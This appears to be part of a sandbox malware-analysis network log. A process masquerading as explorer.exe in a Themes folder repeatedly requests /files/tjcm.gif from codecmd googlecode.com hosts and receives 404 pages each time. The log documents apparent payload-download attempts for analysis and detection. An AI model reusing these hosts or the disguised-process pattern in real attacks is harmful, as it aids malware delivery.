Sep 2, 2024 14:24:19.716650963 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:19 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:19.716675997 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49724	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:21.260008097 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:21.965181112 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:21 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:21.965212107 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49725	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:23.420655012 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:24.117950916 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:24 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:24.118014097 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49726	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:25.379996061 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:26.055723906 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:25 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:26.055814981 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49727	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:27.358764887 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:28.052905083 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:27 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:28.053057909 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49728	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:29.500175953 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:30.185899973 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:30 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:30.186043024 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49729	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:31.409986019 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:32.108582020 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:32 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:32.108606100 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49730	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:33.391478062 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:34.098223925 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:34 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> 